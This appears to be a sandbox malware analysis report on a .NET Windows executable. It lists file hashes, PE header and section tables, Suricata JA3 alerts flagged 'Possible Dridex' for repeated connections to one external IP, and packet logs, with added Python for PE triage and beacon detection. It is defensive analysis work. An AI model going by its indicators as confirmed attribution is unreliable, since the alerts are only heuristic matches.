SHA256: e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
SHA512: e60be536b168890257e483912e89c5061a49f9781ec118517fc58a633ebf6e14cb6d917dc0c4b002faa07b4d4f2fa3b37d7f21725cf768dca74d397aee22f0bc
SSDEEP: 384:x7NC8gTTF+chkAcvEUgE2a24dsp0T808rFaVz:PxgvF+6kVvfbcRaJ
TLSH: E2D6E60223E95126FA7F6B7D5C7242144733BDA3AC36EB4C29EC604E5FA778449607A3
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4053fa
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x53a8           0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x6000           0x58c         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x8000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x531c           0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x3400        0x3400    011f0b5a834ddae1739be2df85bbd209  False     0.48828125          data       5.376676584631292    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x6000           0x58c         0x600     6ce900aa6f5ef6addbe166008c1ea961  False     0.4134114583333333  data       4.023178449253273    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x8000           0xc           0x200     ada691d652edc54d38296e18f64ff460  False     0.044921875         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA     Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0x6090  0x2fc  data                                                                                                 0.43848167539267013
RT_MANIFEST  0x639c  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
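The data directory, section and import tables above are what a reviewer reads to confirm two things about this sample: that it is a .NET executable (a non-empty IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR inside .text, and a single import of mscoree.dll!_CorExeMain), and whether any section is both writable and executable. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the NT headers and section table directly with struct (no pefile dependency), maps a data directory RVA to its section, and runs both checks. The PE image it parses is constructed in the block from the values in the tables above; the second image adds IMAGE_SCN_MEM_WRITE to .text purely to show the W+X check firing, and is not a claim about this sample.

```python
import struct

# Section characteristic flags (winnt.h)
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE      = 0x02000000
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000

# Data directory indices used below
DIR_IMPORT, DIR_RESOURCE, DIR_BASERELOC, DIR_DEBUG, DIR_IAT, DIR_COM_DESCRIPTOR = 1, 2, 5, 6, 12, 14


def build_pe32(sections, dirs):
    """Constructed test input: a header-only PE32 image (DOS stub, NT headers, section table).
    sections: [(name, va, vsize, raw_size, characteristics)]; dirs: {index: (rva, size)}."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 96 + 16 * 8                      # PE32 optional header + 16 data directories
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16)   # Magic ... NumberOfRvaAndSizes
    table = [(0, 0)] * 16
    for idx, entry in dirs.items():
        table[idx] = entry
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in table)
    sec_tbl = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, va, raw, 0, 0, 0, 0, 0, ch)
        for name, va, vsize, raw, ch in sections)
    return dos + b"PE\0\0" + file_hdr + opt + sec_tbl


def parse_pe(data):
    """Parse the data directories and section table of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    _machine, nsec, timestamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_off = opt + (96 if magic == 0x10B else 112)           # PE32 vs PE32+ layout
    ndirs = struct.unpack_from("<I", data, dir_off - 4)[0]    # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", data, dir_off + 8 * i) for i in range(min(ndirs, 16))]
    dirs += [(0, 0)] * (16 - len(dirs))
    sections = []
    for i in range(nsec):
        name, vsize, va, raw, *_rest, ch = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": raw, "characteristics": ch})
    return {"timestamp": timestamp, "dirs": dirs, "sections": sections}


def section_for_rva(sections, rva):
    """Name of the section whose virtual range contains rva, or None (the 'Is in Section' column)."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def triage(pe):
    """Two checks: sections that are writable and executable, and where the CLR header lives."""
    wx = [s["name"] for s in pe["sections"]
          if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE]
    clr_rva, clr_size = pe["dirs"][DIR_COM_DESCRIPTOR]
    clr_section = section_for_rva(pe["sections"], clr_rva) if clr_rva and clr_size else None
    return {"wx_sections": wx, "clr_header_section": clr_section}


# Constructed sample mirroring the data directory and section tables of this report
REPORT_LAYOUT = [
    (".text",  0x2000, 0x3400, 0x3400, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rsrc",  0x6000, 0x58C,  0x600,  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".reloc", 0x8000, 0xC,    0x200,  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ),
]
REPORT_DIRS = {DIR_IMPORT: (0x53A8, 0x4F), DIR_RESOURCE: (0x6000, 0x58C), DIR_BASERELOC: (0x8000, 0xC),
               DIR_DEBUG: (0x531C, 0x38), DIR_IAT: (0x2000, 0x8), DIR_COM_DESCRIPTOR: (0x2008, 0x48)}
SAMPLE_IMAGE = build_pe32(REPORT_LAYOUT, REPORT_DIRS)

# Hypothetical variant: same layout with IMAGE_SCN_MEM_WRITE added to .text, to exercise the W+X check
WX_LAYOUT = [(n, va, vs, raw, (ch | IMAGE_SCN_MEM_WRITE) if n == ".text" else ch)
             for n, va, vs, raw, ch in REPORT_LAYOUT]
WX_IMAGE = build_pe32(WX_LAYOUT, REPORT_DIRS)

if __name__ == "__main__":
    for label, image in (("report layout", SAMPLE_IMAGE), ("writable .text variant", WX_IMAGE)):
        print(label, triage(parse_pe(image)))
```

Run against a real file, replace SAMPLE_IMAGE with the file's bytes; the parser only touches the headers, so it works on the dropped files listed in this report as well as the submitted sample. A CLR header inside .text together with the lone _CorExeMain import is the normal shape of a managed executable; the W+X flag is what the "writeable .text section" signature keys on, and a section table like the one above, with no IMAGE_SCN_MEM_WRITE on .text, would not trigger it.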
Timestamp                        SID      Signature                                 Severity  Source IP    Source Port  Dest IP      Dest Port  Protocol
2024-12-23T09:01:51.144550+0100  2028765  ET JA3 Hash - [Abuse.ch] Possible Dridex  3         192.168.2.4  49801        37.27.43.98  443        TCP
2024-12-23T09:02:27.809321+0100  2028765  ET JA3 Hash - [Abuse.ch] Possible Dridex  3         192.168.2.4  49880        37.27.43.98  443        TCP
2024-12-23T09:03:04.237595+0100  2028765  ET JA3 Hash - [Abuse.ch] Possible Dridex  3         192.168.2.4  49964        37.27.43.98  443        TCP
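The three JA3 alerts above fire on three separate TLS connections from 192.168.2.4 to 37.27.43.98:443 about 36 seconds apart, and the packet table that follows lists the individual packets of the earlier connections. The Python below is an added example, not part of the Joe Sandbox report: it folds a packet table into per-connection flows (packets per direction, duration) and checks the alert timestamps for a near-constant interval, which is the simplest beaconing heuristic an analyst applies to a report like this one. The alert rows and the packet rows are taken from this report and embedded tab-separated in the report's own column order; the packet rows are a subset, and the 192.168. prefix used to tell client from server is an assumption that matches the sandbox network shown here.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

LOCAL_PREFIX = "192.168."   # assumed client network of the sandbox in this report

# Constructed input: the three Suricata alert rows of this report, tab-separated
# (Timestamp, SID, Signature, Severity, Source IP, Source Port, Dest IP, Dest Port, Protocol)
ALERTS = """\
2024-12-23T09:01:51.144550+0100\t2028765\tET JA3 Hash - [Abuse.ch] Possible Dridex\t3\t192.168.2.4\t49801\t37.27.43.98\t443\tTCP
2024-12-23T09:02:27.809321+0100\t2028765\tET JA3 Hash - [Abuse.ch] Possible Dridex\t3\t192.168.2.4\t49880\t37.27.43.98\t443\tTCP
2024-12-23T09:03:04.237595+0100\t2028765\tET JA3 Hash - [Abuse.ch] Possible Dridex\t3\t192.168.2.4\t49964\t37.27.43.98\t443\tTCP
"""

# Constructed input: a subset of the packet rows of this report, tab-separated
# (Timestamp, Source Port, Dest Port, Source IP, Dest IP)
PACKETS = """\
Dec 23, 2024 09:01:07.345885992 CET\t49772\t443\t192.168.2.4\t20.233.83.145
Dec 23, 2024 09:01:07.345912933 CET\t443\t49772\t20.233.83.145\t192.168.2.4
Dec 23, 2024 09:01:07.345988989 CET\t49772\t443\t192.168.2.4\t20.233.83.145
Dec 23, 2024 09:01:10.466129065 CET\t49772\t443\t192.168.2.4\t20.233.83.145
Dec 23, 2024 09:01:10.605777025 CET\t49778\t443\t192.168.2.4\t185.199.109.133
Dec 23, 2024 09:01:10.605875969 CET\t443\t49778\t185.199.109.133\t192.168.2.4
Dec 23, 2024 09:01:12.553127050 CET\t49778\t443\t192.168.2.4\t185.199.109.133
"""


def parse_packet_ts(text):
    """'Dec 23, 2024 09:01:07.345885992 CET' -> naive datetime; nanoseconds truncated to microseconds."""
    body = text.rsplit(" ", 1)[0]           # drop the zone label
    main, frac = body.rsplit(".", 1)
    return datetime.strptime(f"{main}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def summarize_flows(packet_text):
    """Group packets into flows keyed (client, client_port, server, server_port), counting each direction."""
    flows = {}
    for line in packet_text.splitlines():
        ts, sport, dport, src, dst = line.split("\t")
        t = parse_packet_ts(ts)
        if src.startswith(LOCAL_PREFIX):
            key, direction = (src, int(sport), dst, int(dport)), "out"
        else:
            key, direction = (dst, int(dport), src, int(sport)), "in"
        f = flows.setdefault(key, {"out": 0, "in": 0, "first": t, "last": t})
        f[direction] += 1
        f["first"], f["last"] = min(f["first"], t), max(f["last"], t)
    return flows


def parse_alert_ts(text):
    """Suricata timestamp with numeric offset, e.g. 2024-12-23T09:01:51.144550+0100."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%S.%f%z")


def beacon_candidates(alert_text, max_jitter=0.10, min_hits=3):
    """Flag (src, dst, dport, sid) tuples whose alerts recur at a near-constant interval.
    jitter = population stddev of the inter-alert gaps divided by their mean."""
    hits = defaultdict(list)
    for line in alert_text.splitlines():
        ts, sid, _sig, _sev, src, _sport, dst, dport, _proto = line.split("\t")
        hits[(src, dst, int(dport), sid)].append(parse_alert_ts(ts))
    found = {}
    for key, times in hits.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg > 0 else float("inf")
        if jitter <= max_jitter:
            found[key] = {"hits": len(times), "mean_gap_s": avg, "jitter": jitter}
    return found


if __name__ == "__main__":
    for key, f in summarize_flows(PACKETS).items():
        print(key, f["out"], "out /", f["in"], "in,", (f["last"] - f["first"]).total_seconds(), "s")
    for key, b in beacon_candidates(ALERTS).items():
        print(key, b)
```

With three hits the interval estimate rests on two gaps, so treat the result as a lead rather than a verdict; on a longer capture the same function separates a fixed-interval beacon (jitter near zero) from ordinary browsing to the same host. The flow summary is also where the "HTTP GET or POST without a user agent" and JA3 observations get tied back to specific client ports, which is what you need when pivoting from this report into a packet capture.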
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 23, 2024 09:01:07.345885992 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:07.345912933 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:07.345988989 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:07.359390020 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:07.359405994 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:08.944979906 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:08.945077896 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:09.039179087 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:09.039207935 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:09.039655924 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:09.081130028 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:09.702905893 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:09.743334055 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:10.456841946 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:10.457403898 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:10.457551003 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:10.457555056 CET  443          49772      20.233.83.145    192.168.2.4
Dec 23, 2024 09:01:10.457629919 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:10.466129065 CET  49772        443        192.168.2.4      20.233.83.145
Dec 23, 2024 09:01:10.605777025 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:10.605875969 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:10.605969906 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:10.606420040 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:10.606451035 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:11.827982903 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:11.828177929 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:11.831177950 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:11.831193924 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:11.831501961 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:11.833133936 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:11.875344038 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.333348036 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.334330082 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.334366083 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.334408998 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.334444046 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.334494114 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.338545084 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.346954107 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.347034931 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.347048044 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.355284929 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.355359077 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.355369091 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.363651037 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.363702059 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.363712072 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.414755106 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.453233957 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.503175974 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.503191948 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.528965950 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.529184103 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.529195070 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.538003922 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.538099051 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.538115025 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.545478106 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.545553923 CET  49778        443        192.168.2.4      185.199.109.133
Dec 23, 2024 09:01:12.545564890 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.553064108 CET  443          49778      185.199.109.133  192.168.2.4
Dec 23, 2024 09:01:12.553127050 CET  49778        443        192.168.2.4      185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.553138018 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.560663939 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.560740948 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.560750961 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.568193913 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.568270922 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.568280935 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.575710058 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.575805902 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.575813055 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.583221912 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.583297968 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.583308935 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596586943 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596724987 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596790075 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596797943 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596853018 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.602602959 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608618975 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608735085 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608736992 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608760118 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608918905 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.717252970 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741467953 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741477966 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741548061 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741566896 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741574049 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741602898 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741641998 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741662979 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741672039 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741691113 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.768615007 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.768626928 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.768646002 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.768666029 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.768703938 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.768718004 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.768752098 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.792175055 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.792190075 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.792217970 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.792268038 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.792280912 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.792321920 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.846831083 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.909288883 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.909298897 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.909349918 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.909363031 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.909389973 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.909426928 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.909440041 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.909488916 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.927577019 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.927586079 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.927622080 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.927673101 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.927685976 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.927700996 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.927731037 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.946707010 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.946733952 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.946818113 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.946827888 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.946872950 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.965128899 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.965218067 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.965223074 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.965233088 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.965270042 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.965291023 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.983733892 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.983762026 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.983819962 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.983850956 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.983875036 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.983892918 CET49778443192.168.2.4185.199.109.133
